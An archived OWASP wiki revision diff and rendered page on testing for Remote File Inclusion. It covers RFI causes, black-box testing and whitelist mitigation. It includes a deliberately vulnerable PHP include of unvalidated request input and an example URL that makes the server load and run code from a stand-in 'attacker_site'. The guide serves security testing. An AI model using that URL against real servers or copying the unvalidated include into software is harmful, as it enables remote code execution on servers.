This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "Testing for Remote File Inclusion"
(Page created) |
|||
Line 3: | Line 3: | ||
== Brief Summary == | == Brief Summary == | ||
− | File Inclusion vulnerability allows an attacker to include a file, usually | + | File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation. |
+ | This can lead to something as outputting the contents of the file, but depending on the severity, it can also lead to: | ||
*Code execution on the web server | *Code execution on the web server | ||
Line 9: | Line 10: | ||
*Denial of Service (DoS) | *Denial of Service (DoS) | ||
*Sensitive Information Disclosure | *Sensitive Information Disclosure | ||
+ | |||
+ | The File inclusion vulnerability could be of two types: | ||
+ | * Local | ||
+ | * Remote | ||
== Description of the Issue == | == Description of the Issue == | ||
− | Remote File Inclusion (also known as RFI) is ... | + | Remote File Inclusion (also known as RFI) is the process of including remote files through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing external URL to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others. |
== Black Box testing and example == | == Black Box testing and example == | ||
− | + | Since RFI occurs when paths passed to "include" statements are not properly sanitized, in a blackbox testing approach, we should look for scripts which take filenames as parameters. Consider the following PHP example: | |
+ | <pre> | ||
+ | $incfile = $_REQUEST["file"]; | ||
+ | include($incfile.".php"); | ||
+ | </pre> | ||
− | + | In this example the path is extracted from the HTTP request and no input validation is done (for example, by checking the input against a white list), so this snippet of code results vulnerable to this type of attack. Consider infact the following URL: | |
+ | |||
+ | <pre> | ||
+ | http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page | ||
+ | </pre> | ||
+ | |||
+ | In this case the remote file is going to be included and any code contained in it is going to be run by the server. | ||
+ | |||
+ | <pre> | ||
+ | http://vulnerable_host/preview.php?file=example.html | ||
+ | </pre> | ||
− | |||
== Mitigation == | == Mitigation == | ||
− | + | The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem/framework API. | |
+ | If this is not possible the application can maintain a white list of files, that may be included by the page, and then use an identifier (for example the index number) to access to the selected file. Any request containing an invalid identifier has to be rejected, in this way there is no attack surface for malicious users to manipulate the path. | ||
== References == | == References == | ||
− | * Wikipedia - http:// | + | '''Whitepapers''' |
− | + | * “Remote File Inclusion” - http://projects.webappsec.org/w/page/13246955/Remote%20File%20Inclusion | |
− | + | * Wikipedia: "Remote File Inclusion" - http://en.wikipedia.org/wiki/Remote_File_Inclusion | |
− |
Revision as of 16:47, 6 March 2014
This article is part of the new OWASP Testing Guide v4.
Back to the OWASP Testing Guide v4 ToC: https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents Back to the OWASP Testing Guide Project: https://www.owasp.org/index.php/OWASP_Testing_Project
Brief Summary
File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as outputting the contents of the file, but depending on the severity, it can also lead to:
- Code execution on the web server
- Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS)
- Denial of Service (DoS)
- Sensitive Information Disclosure
The File inclusion vulnerability could be of two types:
- Local
- Remote
Description of the Issue
Remote File Inclusion (also known as RFI) is the process of including remote files through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing external URL to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.
Black Box testing and example
Since RFI occurs when paths passed to "include" statements are not properly sanitized, in a blackbox testing approach, we should look for scripts which take filenames as parameters. Consider the following PHP example:
$incfile = $_REQUEST["file"]; include($incfile.".php");
In this example the path is extracted from the HTTP request and no input validation is done (for example, by checking the input against a white list), so this snippet of code results vulnerable to this type of attack. Consider infact the following URL:
http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page
In this case the remote file is going to be included and any code contained in it is going to be run by the server.
http://vulnerable_host/preview.php?file=example.html
Mitigation
The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem/framework API. If this is not possible the application can maintain a white list of files, that may be included by the page, and then use an identifier (for example the index number) to access to the selected file. Any request containing an invalid identifier has to be rejected, in this way there is no attack surface for malicious users to manipulate the path.
References
Whitepapers
- “Remote File Inclusion” - http://projects.webappsec.org/w/page/13246955/Remote%20File%20Inclusion
- Wikipedia: "Remote File Inclusion" - http://en.wikipedia.org/wiki/Remote_File_Inclusion